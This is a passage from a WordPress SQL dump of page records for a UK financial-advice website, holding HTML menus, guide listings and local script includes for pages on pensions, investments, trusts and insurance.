occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main-min.js\"/></body>','Group Pension Plans - Registered Pension Scheme','A group personal pension (GPP) plan is a registered pension scheme: a collection of individual personal plans grouped together by the pension provider.','publish','closed','closed','','group-pension-plans-registered-pension-scheme','','','2017-09-21 16:34:31','2017-09-21 16:34:31','',0,'http://www.equalitywalk.org.uk/group-pension-plans-registered-pension-scheme',0,'page','',0),(70,1,'2017-09-21 16:34:31','2017-09-21 16:34:31','<div id=\"wrapper\">\r\n<div id=\"main\" class=\"clearfix \">\r\n<div class=\"avada-row\">\r\n<div id=\"sidebar\" style=\"float: right;\">\r\n<div id=\"text-24\" class=\"widget widget_text\">\r\n<div id=\"text-23\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><script src=\"/wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\r\n</body></p>\r\n// ]]></script></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','A Guide To Auto Enrolment','','publish','closed','closed','','a-guide-to-auto-enrolment','','','2017-09-21 17:21:29','2017-09-21 17:21:29','',0,'http://www.equalitywalk.org.uk/a-guide-to-auto-enrolment',0,'page','',0),(71,1,'2017-09-21 16:34:32','2017-09-21 16:34:32','<body class=\"archive tax-portfolio_category term-guides term-16 light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n									<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n			<div class=\"page-title-captions\">&#13;\n			<h1 class=\"entry-title\">&#13;\n									Guides							</h1>&#13;\n			</div>&#13;\n									<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li>Guides</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n									<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n				<div id=\"content\" class=\"portfolio portfolio-two \" style=\"width:100%\">&#13;\n				<div class=\"portfolio-wrapper\">&#13;\n									<div class=\"portfolio-item guides smart-money \">&#13;\n				<div class=\"image\">&#13;\n																									<div class=\"image-extras\">&#13;\n						<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"/portfolio-items/smart-money-nov-dec\">Permalink</a>&#13;\n							<a href=\"#\"><img style=\"display:none;\" alt=\"\"/>Gallery</a>&#13;\n							<h3 class=\"entry-title\">Smart Money: Nov-Dec&#13;\n						</h3></div>&#13;\n					</div>&#13;\n				</div>&#13;\n															</div>&#13;\n									<div class=\"portfolio-item guides insurance \">&#13;\n				<div class=\"image\">&#13;\n																									<div class=\"image-extras\">&#13;\n						<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"/portfolio-items/critical-illness-guide\">Permalink</a>&#13;\n							<a href=\"#\"><img style=\"display:none;\" alt=\"\"/>Gallery</a>&#13;\n							<h3 class=\"entry-title\">Critical Illness Guide&#13;\n						</h3></div>&#13;\n					</div>&#13;\n				</div>&#13;\n															</div>&#13;\n									<div class=\"portfolio-item auto-enrolment-2 guides \">&#13;\n				<div class=\"image\">&#13;\n																									<div class=\"image-extras\">&#13;\n						<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"/portfolio-items/guide-auto-enrolment\">Permalink</a>&#13;\n							<a href=\"#\"><img style=\"display:none;\" alt=\"\"/>Gallery</a>&#13;\n							<h3 class=\"entry-title\">A Guide To Auto Enrolment&#13;\n						</h3></div>&#13;\n					</div>&#13;\n				</div>&#13;\n															</div>&#13;\n									<div class=\"portfolio-item guides investment \">&#13;\n				<div class=\"image\">&#13;\n																									<div class=\"image-extras\">&#13;\n						<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"/\">Permalink</a>&#13;\n							<a href=\"#\"><img style=\"display:none;\" alt=\"\"/>Gallery</a>&#13;\n							<h3 class=\"entry-title\">Investing For Income&#13;\n						</h3></div>&#13;\n					</div>&#13;\n				</div>&#13;\n															</div>&#13;\n									<div class=\"portfolio-item guides investment \">&#13;\n				<div class=\"image\">&#13;\n																									<div class=\"image-extras\">&#13;\n						<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"/\">Permalink</a>&#13;\n							<a href=\"#\"><img style=\"display:none;\" alt=\"\"/>Gallery</a>&#13;\n							<h3 class=\"entry-title\">A Guide To Investment – Different Ways To Grow &amp; Protect Your Wealth&#13;\n						</h3></div>&#13;\n					</div>&#13;\n				</div>&#13;\n															</div>&#13;\n									<div class=\"portfolio-item guides \">&#13;\n				<div class=\"image\">&#13;\n																									<div class=\"image-extras\">&#13;\n						<div class=\"image-extras-content\">&#13;\n														<a style=\"display:inline-block;\" class=\"icon link-icon\" href=\"/portfolio-items/a-guide-to-protection-planning\">Permalink</a>&#13;\n							<a href=\"#\"><img style=\"display:none;\" alt=\"\"/>Gallery</a>&#13;\n							<h3 class=\"entry-title\">A Guide To Protection Planning&#13;\n						</h3></div>&#13;\n					</div>&#13;\n				</div>&#13;\n															</div>&#13;\n					</div>&#13;\n		<div class=\"pagination clearfix\"><span class=\"current\">1</span><a href=\"http://www.equalitywalk.org.uk/portfolio_category/guides/page/2/\" class=\"inactive\">2</a><a class=\"pagination-next\" href=\"/\">Next<span class=\"page-next\"/></a></div>&#13;\n	</div>&#13;\n	<div id=\"sidebar\" style=\"display:none\">&#13;\n		</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"/how-much-money-can-i-get-pension\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/7-pension-release-rules\">7 Pension Release Rules to consider – so YOU don’t lose out.</a>&#13;\n							<span class=\"post-date\">August 29, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/pension-liberation-good-plan-or-bad-scam\">Pension Liberation – Good plan or bad scam?</a>&#13;\n							<span class=\"post-date\">July 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/from-the-kitchen-table-to-the-wealth-management-marketplace-our-20-year-story\">From the Kitchen Table to the Wealth Management Marketplace – A 20 Year Story</a>&#13;\n							<span class=\"post-date\">July 2, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main-min.js\"/></body>','Guides','','publish','closed','closed','','guides','','','2017-09-21 16:34:32','2017-09-21 16:34:32','',0,'http://www.equalitywalk.org.uk/guides',0,'page','',0);
INSERT INTO `wp_posts` VALUES (72,1,'2017-09-21 16:34:32','2017-09-21 16:34:32','<body class=\"single single-post postid-1545 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our 